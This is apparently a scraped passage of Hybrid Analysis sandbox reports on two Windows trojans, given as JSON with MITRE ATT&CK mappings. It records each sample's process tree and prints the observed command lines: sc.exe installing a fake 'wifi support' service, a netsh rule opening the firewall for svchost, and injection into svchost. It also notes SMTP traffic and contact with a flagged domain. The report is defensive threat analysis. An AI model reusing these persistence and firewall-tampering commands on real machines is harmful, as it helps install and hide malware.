"\"2087167d54553de4bc0b07816f62c8a1a94ca5edd7503bd5add21edd296b5c41.exe\" wrote 32256 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\jaigqlsg.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000100100000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...", "origin": "API Call", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Anti-Reverse Engineering", "identifier": "static-6", "relevance": 1, "name": "Section contains high entropy", "description": "\"2087167d54553de4bc0b07816f62c8a1a94ca5edd7503bd5add21edd296b5c41\" has section name .text with entropy \"6.630102803682182\"\n \"2087167d54553de4bc0b07816f62c8a1a94ca5edd7503bd5add21edd296b5c41\" has section name .text with entropy \"7.972855291312212\"\n \"2087167d54553de4bc0b07816f62c8a1a94ca5edd7503bd5add21edd296b5c41\" has section name .reloc with entropy \"6.221511032398267\"\n \"jaigqlsg.exe\" has section name .text with entropy \"6.630102803682182\"\n \"jaigqlsg.exe\" has section name .text with entropy \"7.972855291312212\"\n \"jaigqlsg.exe\" has section name .reloc with entropy \"6.221496050028631\"", "origin": "Static Parser", "attck_id": "T1027.009", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/009"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Network Related", "identifier": "network-23", "type": 7, "relevance": 5, "name": "Sends traffic on typical HTTP outbound port, but without HTTP header", "description": "TCP traffic to <IPv4> on port 443 is sent without HTTP header\n TCP traffic to <IPv4> on port 443 is sent without HTTP header\n TCP traffic to <IPv4> on port 443 is sent without HTTP header", "origin": "Network Traffic", "attck_id": "T1071.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071/001"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "System Security", "identifier": "registry-27", "type": 3, "relevance": 10, "name": "Modifies proxy settings", "description": "\"2087167d54553de4bc0b07816f62c8a1a94ca5edd7503bd5add21edd296b5c41.exe\" (Access type: \"DELETEVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS\\ZONEMAP\"; Key: \"PROXYBYPASS\")\n \"2087167d54553de4bc0b07816f62c8a1a94ca5edd7503bd5add21edd296b5c41.exe\" (Access type: \"DELETEVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS\\ZONEMAP\"; Key: \"PROXYBYPASS\")", "origin": "Registry Access", "attck_id": "T1112", "attck_id_wiki": "https://attack.mitre.org/techniques/T1112"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "General", "identifier": "api-117", "type": 6, "relevance": 10, "name": "Calls an API typically used to execute an application", "description": "\"2087167d54553de4bc0b07816f62c8a1a94ca5edd7503bd5add21edd296b5c41.exe\" called \"ShellExecuteA\" with parameter cmd (UID: 00000000-00005976)\n \"2087167d54553de4bc0b07816f62c8a1a94ca5edd7503bd5add21edd296b5c41.exe\" called \"ShellExecuteA\" with parameter 7363 (UID: 00000000-00005976)\n \"2087167d54553de4bc0b07816f62c8a1a94ca5edd7503bd5add21edd296b5c41.exe\" called \"ShellExecuteA\" with parameter netsh (UID: 00000000-00005976)", "origin": "API Call", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Unusual Characteristics", "identifier": "target-14", "type": 9, "relevance": 8, "name": "Spawns a lot of processes", "description": "Spawned process \"2087167d54553de4bc0b07816f62c8a1a94ca5edd7503bd5add21edd296b5c41.exe\" (UID: 00000000-00005976)\n Spawned process \"cmd.exe\" with commandline \"/C mkdir %WINDIR%\\\\system32\\\\pltdkegk\\\\\" (UID: 00000000-00005968)\n Spawned process \"cmd.exe\" with commandline \"/C move /Y \"%TEMP%\\\\jaigqlsg.exe\" %WINDIR%\\\\system32\\\\pltdkegk\\\\\" (UID: 00000000-00006044)\n Spawned process \"sc.exe\" with commandline \"create pltdkegk binPath= \"%WINDIR%\\\\system32\\\\pltdkegk\\\\jaigqlsg.exe /d\\\\\"C:\\\\2087167d54553de4bc0b07816f62c8a1a94ca5edd7503bd5add21edd296b5c41.exe\\\\\"\" type= own start= auto DisplayName= \"wifi support\"\" (UID: 00000000-00006096)\n Spawned process \"sc.exe\" with commandline \"description pltdkegk \"wifi internet conection\"\" (UID: 00000000-00003764)\n Spawned process \"sc.exe\" with commandline \"start pltdkegk\" (UID: 00000000-00006032)\n Spawned process \"jaigqlsg.exe\" with commandline \"/d\"C:\\\\2087167d54553de4bc0b07816f62c8a1a94ca5edd7503bd5add21edd296b5c41.exe\"\" (UID: 00000000-00004216)\n Spawned process \"netsh.exe\" with commandline \"advfirewall firewall add rule name=\"Host-process for services of Windows\" dir=in action=allow program=\"%WINDIR%\\\\system32\\\\svchost.exe\" enable=yes>nul\" (UID: 00000000-00004188)\n Spawned process \"svchost.exe\" (UID: 00000000-00003600)", "origin": "Monitored Target", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Installation/Persistence", "identifier": "api-0", "type": 6, "relevance": 6, "name": "Writes data to a remote process", "description": "\"2087167d54553de4bc0b07816f62c8a1a94ca5edd7503bd5add21edd296b5c41.exe\" wrote 32 bytes to a remote process \"C:\\Windows\\System32\\sc.exe\" (Handle: 556)\n \"2087167d54553de4bc0b07816f62c8a1a94ca5edd7503bd5add21edd296b5c41.exe\" wrote 52 bytes to a remote process \"C:\\Windows\\System32\\sc.exe\" (Handle: 556)\n \"2087167d54553de4bc0b07816f62c8a1a94ca5edd7503bd5add21edd296b5c41.exe\" wrote 4 bytes to a remote process \"C:\\Windows\\System32\\sc.exe\" (Handle: 556)\n \"2087167d54553de4bc0b07816f62c8a1a94ca5edd7503bd5add21edd296b5c41.exe\" wrote 32 bytes to a remote process \"C:\\Windows\\System32\\sc.exe\" (Handle: 472)\n \"2087167d54553de4bc0b07816f62c8a1a94ca5edd7503bd5add21edd296b5c41.exe\" wrote 52 bytes to a remote process \"C:\\Windows\\System32\\sc.exe\" (Handle: 472)\n \"2087167d54553de4bc0b07816f62c8a1a94ca5edd7503bd5add21edd296b5c41.exe\" wrote 4 bytes to a remote process \"C:\\Windows\\System32\\sc.exe\" (Handle: 472)\n \"2087167d54553de4bc0b07816f62c8a1a94ca5edd7503bd5add21edd296b5c41.exe\" wrote 32 bytes to a remote process \"C:\\Windows\\System32\\sc.exe\" (Handle: 488)\n \"2087167d54553de4bc0b07816f62c8a1a94ca5edd7503bd5add21edd296b5c41.exe\" wrote 52 bytes to a remote process \"C:\\Windows\\System32\\sc.exe\" (Handle: 488)\n \"2087167d54553de4bc0b07816f62c8a1a94ca5edd7503bd5add21edd296b5c41.exe\" wrote 4 bytes to a remote process \"C:\\Windows\\System32\\sc.exe\" (Handle: 488)\n \"2087167d54553de4bc0b07816f62c8a1a94ca5edd7503bd5add21edd296b5c41.exe\" wrote 32 bytes to a remote process \"C:\\Windows\\System32\\netsh.exe\" (Handle: 284)\n \"2087167d54553de4bc0b07816f62c8a1a94ca5edd7503bd5add21edd296b5c41.exe\" wrote 52 bytes to a remote process \"C:\\Windows\\System32\\netsh.exe\" (Handle: 284)\n \"2087167d54553de4bc0b07816f62c8a1a94ca5edd7503bd5add21edd296b5c41.exe\" wrote 4 bytes to a remote process \"C:\\Windows\\System32\\netsh.exe\" (Handle: 284)\n \"jaigqlsg.exe\" wrote 32 bytes to a remote process \"C:\\Windows\\System32\\svchost.exe\" (Handle: 260)\n \"jaigqlsg.exe\" wrote 52 bytes to a remote process \"C:\\Windows\\System32\\svchost.exe\" (Handle: 260)\n \"jaigqlsg.exe\" wrote 4 bytes to a remote process \"C:\\Windows\\System32\\svchost.exe\" (Handle: 260)\n \"jaigqlsg.exe\" wrote 86016 bytes to a remote process \"C:\\Windows\\System32\\svchost.exe\" (Handle: 260)", "origin": "API Call", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Installation/Persistence", "identifier": "api-20", "type": 6, "relevance": 7, "name": "Allocates virtual memory in a remote process", "description": "\"2087167d54553de4bc0b07816f62c8a1a94ca5edd7503bd5add21edd296b5c41.exe\" allocated memory in \"C:\\2087167d54553de4bc0b07816f62c8a1a94ca5edd7503bd5add21edd296b5c41.exe\"", "origin": "API Call", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Anti-Detection/Stealthyness", "identifier": "api-129", "type": 6, "relevance": 10, "name": "Creates a process in suspended mode (likely for process injection)", "description": "\"jaigqlsg.exe\" called \"CreateProcessA\" with parameter \"svchost.exe\" - (UID: 00000000-00004216)", "origin": "API Call", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Anti-Detection/Stealthyness", "identifier": "api-83", "type": 6, "relevance": 7, "name": "Writes PE header to memory", "description": "\"jaigqlsg.exe wrote PE header bytes (\"4d5a90000300000004000000ffff0000b800000000000000400000000000000000000000000000000000000000000000000000000000000000000000d80000000e1fba0e00b409cd21b8014ccd21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000fdb74393b9d62dc0b9d62dc0b9d62dc0b9d62cc028d62dc0b0aebec0b6d62dc0d6a083c0b8d62dc0d6a0b3c0b8d62dc0d6a086c0a2d62dc0d6a0b0c0b8d62dc052696368b9d62dc000000000000000000000000000000000504500004c010400e1db595a0000000000000000e00002010b010a0000e60000004a0000000000006b9a0000001000000000010000000600001000000002000005000100000000000500010000000000005001000004000000000000020040810000100000100000000010000010000000000000100000000000000000000000b0120100a0000000000000000000000000000000000000000000000000000000004001005c0e0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001005c0200000000000000000000000000000000000000000000000000002e74657874000000b0e400000010000000e6000000040000000000000000000000000000200000602e726461746100009a1e0000000001000020000000ea0000000000000000000000000000400000402e64617461000000581900000020010000020000000a0100000000000000000000000000400000c02e72656c6f630000f20f00000040010000100000000c01000000000000000000000000004000004200000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000\") to a remote process \"C:\\Windows\\System32\\svchost.exe\"\n which might be an injection preparation attempt ...", "origin": "API Call", "attck_id": "T1055.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/002"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Anti-Detection/Stealthyness", "identifier": "target-269", "type": 9, "relevance": 7, "name": "Windows system process connects to a network", "description": "Process \"svchost.exe\" connects to <IPv4>:25", "origin": "Monitored Target", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Network Related", "identifier": "network-10", "type": 7, "relevance": 6, "name": "Sends network traffic on a typical mail related ports", "description": "Mail traffic to <IPv4> on port 25 (SMTP)\n Mail traffic to <IPv4> on port 25 (SMTP)\n Mail traffic to <IPv4> on port 25 (SMTP)\n Mail traffic to <IPv4> on port 25 (SMTP)\n Mail traffic to <IPv4> on port 25 (SMTP)\n Mail traffic to <IPv4> on port 25 (SMTP)\n Mail traffic to <IPv4> on port 25 (SMTP)", "origin": "Network Traffic", "attck_id": "T1071.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071/003"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Network Related", "identifier": "network-88", "type": 7, "relevance": 10, "name": "Application communicates with a malicious domain", "description": "Contacted Domain: \"lazystax.ru\" has been identified as malicious", "origin": "Network Traffic", "attck_id": "T1566", "attck_id_wiki": "https://attack.mitre.org/techniques/T1566"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "System Security", "identifier": "target-303", "type": 9, "relevance": 10, "name": "Starts service using SC.exe", "description": "Process \"sc.exe\" with commandline \"start pltdkegk\" (UID: 00000000-00006032)", "origin": "Monitored Target", "attck_id": "T1569.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1569/002"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "System Security", "identifier": "target-15", "type": 9, "relevance": 8, "name": "Modifies firewall settings", "description": "Process \"netsh.exe\" with commandline \"advfirewall firewall add rule name=\"Host-process for services of Windows\" dir=in action=allow program=\"%WINDIR%\\\\system32\\\\svchost.exe\" enable=yes>nul\" (UID: 00000000-00004188)", "origin": "Monitored Target", "attck_id": "T1562.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1562/004"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "External Systems", "identifier": "avtest-8", "type": 12, "relevance": 10, "name": "Sample detected by CrowdStrike Static Analysis and ML with relatively high confidence", "description": "CrowdStrike Static Analysis and ML (QuickScan) yielded detection: win/malicious_confidence_100% (W)", "origin": "External System"}]}
d510af41349a55e3d3c3233acb0540c72492301d3fc360d6aa7c47e1037cd2c2
https://hybrid-analysis.com/sample/d510af41349a55e3d3c3233acb0540c72492301d3fc360d6aa7c47e1037cd2c2
Hybrid Analysis - Um_unhooking
{"size": 11677184, "type": "PE32 executable (GUI) Intel 80386, for MS Windows", "submit_name": "d510af41349a55e3d3c3233acb0540c72492301d3fc360d6aa7c47e1037cd2c2", "sha256": "d510af41349a55e3d3c3233acb0540c72492301d3fc360d6aa7c47e1037cd2c2", "av_detect": 83, "vx_family": "Trojan.BrsecmonE", "threat_score": 100, "threat_level": 2, "verdict": "malicious", "certificates_validation_message": "No signature was present in the subject. (0x800b0100)", "total_network_connections": 5, "total_processes": 9, "total_signatures": 214, "extracted_files": [{"name": "ctbzjelz.exe", "file_path": "%TEMP%\\ctbzjelz.exe", "file_size": 5242368, "sha256": "d7978f57e66a63f6d551534b189c6a9fe69176d7011ff0b7ccb88835107edb93", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows", "runtime_process": "cmd.exe (PID: 1588)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "CTBZJELZ.EXE.67B73BF7.bin", "file_size": 12451328, "sha256": "effbdc0d50e7b90f6d45bef9764a9d35853f3dd19881c81fb41dfeb4f2116394", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "ctbzjelz.exe.67B73BF6.bin", "file_size": 12451328, "sha256": "effbdc0d50e7b90f6d45bef9764a9d35853f3dd19881c81fb41dfeb4f2116394", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows", "threat_level_readable": "no specific threat", "file_available_to_download": true}], "file_metadata": {"file_compositions": ["1 .OBJ Files (COFF) linked with LINK.EXE 5.10 (Visual Studio 5) (build: 24215)", "1 Unknown Objects (build: 24215)", "1 .BAS Files compiled with C2.EXE 5.0 (Visual Basic 6) (build: 24215)"], "imported_objects": ["5 .LIB Files generated with LIB.EXE 9.00 (Visual Studio 2008) (build: 30729)", "17 .OBJ Files (COFF) linked with LINK.EXE 6.00 (Visual Studio 6) (build: 24123)", "30 .OBJ Files (OMF) linked with LINK.EXE 6.00 (Visual Studio 6) (build: 24123)", "18 .OBJ Files (OMF) linked with LINK.EXE 5.10 (Visual Studio 5) (build: 24123)"], "file_analysis": ["File contains Visual Basic code", "File appears to contain raw COFF/OMF content", "File is the product of a small codebase (1 files)"], "total_file_compositions_imports": 91}, "processes": [{"uid": "00000000-00005548", "name": "d510af41349a55e3d3c3233acb0540c72492301d3fc360d6aa7c47e1037cd2c2.exe", "normalized_path": "C:\\d510af41349a55e3d3c3233acb0540c72492301d3fc360d6aa7c47e1037cd2c2.exe", "sha256": "d510af41349a55e3d3c3233acb0540c72492301d3fc360d6aa7c47e1037cd2c2"}, {"uid": "00000000-00005904", "parentuid": "00000000-00005548", "name": "cmd.exe", "normalized_path": "%WINDIR%\\System32\\cmd.exe", "command_line": "/C mkdir %WINDIR%\\system32\\aweovprv\\", "sha256": "17f746d82695fa9b35493b41859d39d786d32b23a9d2e00f4011dec7a02402ae"}, {"uid": "00000000-00001588", "parentuid": "00000000-00005548", "name": "cmd.exe", "normalized_path": "%WINDIR%\\System32\\cmd.exe", "command_line": "/C move /Y \"%TEMP%\\ctbzjelz.exe\" %WINDIR%\\system32\\aweovprv\\", "sha256": "17f746d82695fa9b35493b41859d39d786d32b23a9d2e00f4011dec7a02402ae"}, {"uid": "00000000-00004644", "parentuid": "00000000-00005548", "name": "sc.exe", "normalized_path": "%WINDIR%\\System32\\sc.exe", "command_line": "create aweovprv binPath= \"%WINDIR%\\system32\\aweovprv\\ctbzjelz.exe /d\\\"C:\\d510af41349a55e3d3c3233acb0540c72492301d3fc360d6aa7c47e1037cd2c2.exe\\\"\" type= own start= auto DisplayName= \"wifi support\"", "sha256": "1c2ec0bb83d2ad3f53b0706c46a2604f81f2fc2afdcf43be5914cc8f509dd48c"}, {"uid": "00000000-00002472", "parentuid": "00000000-00005548", "name": "sc.exe", "normalized_path": "%WINDIR%\\System32\\sc.exe", "command_line": "description aweovprv \"wifi internet conection\"", "sha256": "1c2ec0bb83d2ad3f53b0706c46a2604f81f2fc2afdcf43be5914cc8f509dd48c"}, {"uid": "00000000-00002820", "parentuid": "00000000-00005548", "name": "sc.exe", "normalized_path": "%WINDIR%\\System32\\sc.exe", "command_line": "start aweovprv", "sha256": "1c2ec0bb83d2ad3f53b0706c46a2604f81f2fc2afdcf43be5914cc8f509dd48c"}, {"uid": "00000000-00002528", "parentuid": "00000000-00005548", "name": "netsh.exe", "normalized_path": "%WINDIR%\\System32\\netsh.exe", "command_line": "advfirewall firewall add rule name=\"Host-process for services of Windows\" dir=in action=allow program=\"%WINDIR%\\system32\\svchost.exe\" enable=yes>nul", "sha256": "661f5d4ce4f0a6cb32669a43ce5deec6d5a9e19b2387f22c5012405e92169943"}, {"uid": "00000000-00001512", "name": "ctbzjelz.exe", "normalized_path": "%WINDIR%\\system32\\aweovprv\\ctbzjelz.exe", "command_line": "/d\"C:\\d510af41349a55e3d3c3233acb0540c72492301d3fc360d6aa7c47e1037cd2c2.exe\"", "sha256": "effbdc0d50e7b90f6d45bef9764a9d35853f3dd19881c81fb41dfeb4f2116394"}, {"uid": "00000000-00003044", "parentuid": "00000000-00001512", "name": "svchost.exe", "normalized_path": "%WINDIR%\\system32\\svchost.exe", "sha256": "121118a0f5e0e8c933efd28c9901e54e42792619a8a3a6d11e1f0025a7324bc2"}], "mitre_attcks": [{"tactic": "Initial Access", "technique": "Phishing", "attck_id": "T1566", "attck_id_wiki": "https://attack.mitre.org/techniques/T1566", "malicious_identifiers_count": 1}, {"tactic": "Execution", "technique": "Native API", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106", "malicious_identifiers_count": 1, "suspicious_identifiers_count": 4, "informative_identifiers_count": 12}, {"tactic": "Execution", "technique": "Inter-Process Communication", "attck_id": "T1559", "attck_id_wiki": "https://attack.mitre.org/techniques/T1559", "informative_identifiers_count": 3}, {"tactic": "Execution", "technique": "Windows Command Shell", "attck_id": "T1059.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1059/003", "informative_identifiers_count": 1, "parent": {"technique": "Command and Scripting Interpreter", "attck_id": "T1059", "attck_id_wiki": "https://attack.mitre.org/techniques/T1059"}}, {"tactic": "Execution", "technique": "Service Execution", "attck_id": "T1569.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1569/002", "malicious_identifiers_count": 1, "suspicious_identifiers_count": 1, "parent": {"technique": "System Services", "attck_id": "T1569", "attck_id_wiki": "https://attack.mitre.org/techniques/T1569"}}, {"tactic": "Execution", "technique": "Shared Modules", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129", "informative_identifiers_count": 4}, {"tactic": "Persistence", "technique": "Windows Service", "attck_id": "T1543.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543/003", "malicious_identifiers_count": 1, "suspicious_identifiers_count": 1, "informative_identifiers_count": 4, "parent": {"technique": "Create or Modify System Process", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543"}}, {"tactic": "Persistence", "technique": "Component Object Model Hijacking", "attck_id": "T1546.015", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546/015", "informative_identifiers_count": 1, "parent": {"technique": "Event Triggered Execution", "attck_id": "T1546", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546"}}, {"tactic": "Persistence", "technique": "Create or Modify System Process", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543", "informative_identifiers_count": 1}, {"tactic": "Persistence", "technique": "Registry Run Keys / Startup Folder", "attck_id": "T1547.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547/001", "informative_identifiers_count": 1, "parent": {"technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547"}}, {"tactic": "Persistence", "technique": "DLL Side-Loading", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002", "informative_identifiers_count": 1, "parent": {"technique": "Hijack Execution Flow", "attck_id": "T1574", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574"}}, {"tactic": "Privilege Escalation", "technique": "Dynamic-link Library Injection", "attck_id": "T1055.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/001", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Token Impersonation/Theft", "attck_id": "T1134.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134/001", "informative_identifiers_count": 2, "parent": {"technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134"}}, {"tactic": "Privilege Escalation", "technique": "Thread Execution Hijacking", "attck_id": "T1055.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/003", "suspicious_identifiers_count": 1, "informative_identifiers_count": 2, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Create Process with Token", "attck_id": "T1134.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134/002", "informative_identifiers_count": 1, "parent": {"technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134"}}, {"tactic": "Privilege Escalation", "technique": "Windows Service", "attck_id": "T1543.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543/003", "malicious_identifiers_count": 1, "suspicious_identifiers_count": 1, "informative_identifiers_count": 4, "parent": {"technique": "Create or Modify System Process", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543"}}, {"tactic": "Privilege Escalation", "technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055", "malicious_identifiers_count": 5, "suspicious_identifiers_count": 1, "informative_identifiers_count": 2}, {"tactic": "Privilege Escalation", "technique": "Component Object Model Hijacking", "attck_id": "T1546.015", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546/015", "informative_identifiers_count": 1, "parent": {"technique": "Event Triggered Execution", "attck_id": "T1546", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546"}}, {"tactic": "Privilege Escalation", "technique": "Create or Modify System Process", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543", "informative_identifiers_count": 1}, {"tactic": "Privilege Escalation", "technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134", "informative_identifiers_count": 2}, {"tactic": "Privilege Escalation", "technique": "Portable Executable Injection", "attck_id": "T1055.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/002", "malicious_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Process Hollowing", "attck_id": "T1055.012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/012", "malicious_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Exploitation for Privilege Escalation", "attck_id": "T1068", "attck_id_wiki": "https://attack.mitre.org/techniques/T1068", "suspicious_identifiers_count": 1}, {"tactic": "Privilege Escalation", "technique": "Extra Window Memory Injection", "attck_id": "T1055.011", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/011", "suspicious_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Registry Run Keys / Startup Folder", "attck_id": "T1547.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547/001", "informative_identifiers_count": 1, "parent": {"technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547"}}, {"tactic": "Privilege Escalation", "technique": "DLL Side-Loading", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002", "informative_identifiers_count": 1, "parent": {"technique": "Hijack Execution Flow", "attck_id": "T1574", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574"}}, {"tactic": "Defense Evasion", "technique": "Dynamic-link Library Injection", "attck_id": "T1055.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/001", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Debugger Evasion", "attck_id": "T1622", "attck_id_wiki": "https://attack.mitre.org/techniques/T1622", "informative_identifiers_count": 4}, {"tactic": "Defense Evasion", "technique": "Timestomp", "attck_id": "T1070.006", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/006", "informative_identifiers_count": 1, "parent": {"technique": "Indicator Removal", "attck_id": "T1070", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070"}}, {"tactic": "Defense Evasion", "technique": "Token Impersonation/Theft", "attck_id": "T1134.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134/001", "informative_identifiers_count": 2, "parent": {"technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134"}}, {"tactic": "Defense Evasion", "technique": "File and Directory Permissions Modification", "attck_id": "T1222", "attck_id_wiki": "https://attack.mitre.org/techniques/T1222", "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Thread Execution Hijacking", "attck_id": "T1055.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/003", "suspicious_identifiers_count": 1, "informative_identifiers_count": 2, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Modify Registry", "attck_id": "T1112", "attck_id_wiki": "https://attack.mitre.org/techniques/T1112", "suspicious_identifiers_count": 2, "informative_identifiers_count": 4}, {"tactic": "Defense Evasion", "technique": "Create Process with Token", "attck_id": "T1134.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134/002", "informative_identifiers_count": 1, "parent": {"technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134"}}, {"tactic": "Defense Evasion", "technique": "Time Based Evasion", "attck_id": "T1497.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/003", "informative_identifiers_count": 4, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Defense Evasion", "technique": "User Activity Based Checks", "attck_id": "T1497.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/002", "informative_identifiers_count": 1, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Defense Evasion", "technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055", "malicious_identifiers_count": 5, "suspicious_identifiers_count": 1, "informative_identifiers_count": 2}, {"tactic": "Defense Evasion", "technique": "Disable or Modify System Firewall", "attck_id": "T1562.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1562/004", "malicious_identifiers_count": 1, "suspicious_identifiers_count": 1, "informative_identifiers_count": 1, "parent": {"technique": "Impair Defenses", "attck_id": "T1562", "attck_id_wiki": "https://attack.mitre.org/techniques/T1562"}}, {"tactic": "Defense Evasion", "technique": "Hide Artifacts", "attck_id": "T1564", "attck_id_wiki": "https://attack.mitre.org/techniques/T1564", "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Execution Guardrails", "attck_id": "T1480", "attck_id_wiki": 